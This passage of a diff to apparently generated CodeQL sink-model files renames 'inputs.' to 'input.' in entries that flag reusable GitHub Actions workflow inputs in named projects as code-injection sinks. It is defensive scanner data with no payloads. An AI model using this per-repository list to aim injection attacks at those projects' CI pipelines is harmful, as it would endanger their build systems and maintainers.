["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index 4bbd06a86f5..3561bd15c36 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "inputs.pr_number", "code-injection", "generated"] \ No newline at end of file + - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index 59bdab8f39b..29da5a83b62 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "inputs.qt_backend", "code-injection", "generated"] \ No newline at end of file + - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 6988e25d41c..9b92197cf5d 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.target_platform", "code-injection", "generated"] - - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.fprime_location", "code-injection", "generated"] - - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.default_target_ref", "code-injection", "generated"] - - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.target_repository", "code-injection", "generated"] \ No newline at end of file + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.fprime_location", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "input.default_target_ref", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "input.target_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index 3c025f59b78..cbed3964cff 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "inputs.invoke_context_name", "code-injection", "generated"] \ No newline at end of file + - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 5de0d170d40..29b47c04336 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.with_default", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_optional", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_optional", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_optional", "code-injection", "generated"] \ No newline at end of file + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.string_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.number_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.number_required", "code-injection", 
"generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.bool_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.bool_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.string_optional", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index 19d38d1241d..3c406b3bc0e 100644 --- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "inputs.build_flags", "code-injection", "generated"] \ No newline at end of file + - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index b1c787677a6..3a94887f8ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.custom_run_id", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.non_validator_mode", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_optimism_options", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.network", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_options", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.cl_client", "code-injection", "generated"] \ No newline at end of file + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.non_validator_mode", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.additional_optimism_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.network", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.additional_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.cl_client", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 249c734f55b..5198d5f418a 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "inputs.agent_version", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "inputs.test_mode", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/multiverse_run.yml", "*", "inputs.agentVersion", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.dry-run", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.prefix", "code-injection", "generated"] \ No newline at end of file + - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "input.test_mode", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/multiverse_run.yml", "*", "input.agentVersion", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "input.dry-run", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "input.prefix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index 46951b5436d..e3694a38973 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "inputs.page", "code-injection", "generated"] - - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "inputs.agent-ref", "code-injection", "generated"] \ No newline at end of file + - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] + - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "input.agent-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index cd1d0f318ef..f6f33154581 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.changelog_file", "code-injection", "generated"] - - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.workflows", "code-injection", "generated"] - - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.changelog_file", "code-injection", "generated"] - - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.release_type", "code-injection", "generated"] \ No newline at end of file + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.workflows", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "input.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "input.release_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 4055874a790..34efc8414d8 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] - - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] - - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] - - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] \ No newline at end of file + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index bccd7271b08..71866026ef9 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml 
@@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.source_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.dry_run", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] \ No newline at end of file + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", 
"input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.dry_run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index 56528159143..83d241d21c0 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.shard", "code-injection", "generated"] - - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.db", "code-injection", "generated"] \ No newline at end of file + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.db", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index c4a9b07ed99..3021de12568 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml 
@@ -3,18 +3,18 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.docker_image", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.terraform_workspace", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_hubspot_embed", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_mail_server_domain", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_widget_embed_path", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] - - 
["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] \ No newline at end of file + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.terraform_workspace", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_ws_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_api_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_hubspot_embed", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_mail_server_domain", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_widget_embed_path", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_ws_url", "code-injection", "generated"] + - 
["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_api_url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index db4f26083a0..d2cb1da1e9f 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index c12a079e2e2..c551a135a14 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.npmVersion", "code-injection", "generated"] - - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.nodeVersion", "code-injection", "generated"] \ No newline at end of file + - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] + - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.nodeVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index 3b7122a7a13..f469f5de268 100644 
--- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 3e80edaaaff..7ec8dac3f7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index 99717acf024..4ce9252ce76 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/ini/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index d9a066c2b22..abb5b43c327 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index 83e68740ac0..9e9da70e88e 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index 45f05ea8826..8de3f4c1ca4 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 1cd25da918f..5ec8c096934 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index 2d5a077f1f4..af9582282d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/node-which/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml 